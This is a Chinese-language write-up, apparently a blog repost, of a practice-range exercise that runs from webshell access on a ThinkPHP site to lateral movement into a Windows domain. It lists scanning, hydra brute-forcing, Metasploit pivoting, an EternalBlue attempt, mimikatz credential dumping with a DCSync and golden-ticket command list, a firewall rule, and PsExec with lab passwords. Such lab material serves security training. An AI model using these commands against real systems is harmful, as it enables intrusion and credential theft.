靶场操练 - getshell+横向渗透

靶场信息

• 作    者： 小星星                                

• 创建时间： 2020年3月13日 02:52                           

• 标    签：  APT攻击|Kill Chain|安全靶场|红蓝对抗|ATT&CK

• 下载链接：http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

• win7账号密码：sunheart 123.com sunAdministrator dc123123.com

• 2008账号密码：sunadmin 2021.com

• Win7双网卡模拟内外网

• 此处可以注意下，先把每个账号都登录下看下，因为密码过期的原因，后面可能导致实验不成功，密码过期的账户，你登录后会提示修改密码

• 初始win7

  sunheart 123.com

  sunAdministrator dc123.com

  初始2008

  sunadmin 2020.com

渗透之路修仙之路

参考文章：https://mp.weixin.qq.com/s/FJokXBYWXCsQtB-9i0xUTw

靶场配置

导入win7和2008虚拟机，win7虚拟机1网卡设置NAT，设置网络自动获取IP，打开C盘下phpstudy

渗透开始

扫描存活主机

arp-scan -l
masscan -p 80,22,3306,3389 192.168.44.0/24
nmap -sP 192.168.44.0/24

找到目标IP：192.168.44.132

扫描开放端口

nmap -sS -sV -v -p- -A 192.168.44.132

得到信息：80、3306(mysql)

先用hydra爆破下3306，这条路好像是行不通

sudo hydra -l root -P /usr/share/john/password.lst 192.168.44.132 mysql

目录扫描

这里还用dirb等扫过，没啥主要的

访问网站，发现是ThinkPHP框架，通过访问不存在的路径达到报错效果，可以看到一些特征

访问robots.txt也没什么信息

访问index.php

访问index.html

访问add.php是个大马

可以从这里入手，抓包爆破下密码

爆出密码去登录下试试

别有洞天

依然信息收集，这个马子很多命令都没有回显所以肯定要换个方法

whoami

也可以用工具看下thinkphp是否存在已知的漏洞

此处为了方便还是上传一个木马到webshell管理工具上

乱码问题改下编码

简单的信息收集一下，补丁情况可以拿到http://blog.neargle.com/win-powerup-exp-index/看看

systeminfo

ipconfig /all

显而易见肯定有域的（这不是废话嘛）

把shell弹回给MSF

提权

getsystem
getuid

前面知道有第二张网卡，那么接着整

MSF添加路由

run autoroute -s 192.168.138.0/24

查看路由

run autoroute -p

扫一下存活主机

run arp-scanner -r 192.168.138.0/24

得到信息：192.168.138.138

设置sock5代理,我这里又出问题了。。。。哎。。。太菜了，有没有巨佬帮帮弟弟

use auxiliary/server/socks_proxy
set srvport 9050
vim /etc/proxychains4.conf

扫描一下端口

use auxiliary/scanner/portscan/tcp

得到信息：只开放了445端口

使用MS17-010打一下试试看

use exploit/windows/smb/ms17_010_eternalblue

不过失败了，不过也不要紧

先前有看到系统是64位的

使用自带的hashdump抓取hash

run hashdump

使用下mimikatz抓，进程需要先迁移到64位的

ps
migrate 452

此处输入？，可以看下kiwi

没有可以load mimikatz

creds_all：列举所有凭据
creds_kerberos：列举所有kerberos凭据
creds_msv：列举所有msv凭据
creds_ssp：列举所有ssp凭据
creds_tspkg：列举所有tspkg凭据
creds_wdigest：列举所有wdigest凭据
dcsync：通过DCSync检索用户帐户信息
dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create：创建黄金票据
kerberos_ticket_list：列举kerberos票据
kerberos_ticket_purge：清除kerberos票据
kerberos_ticket_use：使用kerberos票据
kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam：dump出lsa的SAM
lsa_dump_secrets：dump出lsa的密文
password_change：修改密码
wifi_list：列出当前用户的wifi配置文件
wifi_list_shared：列出共享wifi配置文件/编码

lsa_dump_sam

kiwi_cmd sekurlsa::logonPasswords //抓取明文

creds_all 效果也是一样的

抓到了域用户，那么就可以尝试psexec传递了，MSF失败了。。。。。。愚昧。。。。正好换CS搞

通过CS来做

上传CS木马上线

抓取明文

CS多层内网上线

设置防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=9999

这里说明一下，搞了好久。。。一直报句柄无效，不过最后解决了。如果你也做了这个靶场，并且到这里出现和我一样的问题，可以后台私信我，看看能不能提供点帮助给你，我这里就不贴出来。

shell C:WINDOWSTempPsExec.exe -accepteula \192.168.138.138 - u Administrator -p dc123123.com -d -c C:WINDOWSTemp2222.exe

剩下的挂代理就可以了，结束

原文始发于微信公众号（Nurburgring）：靶场操练 - getshell+横向渗透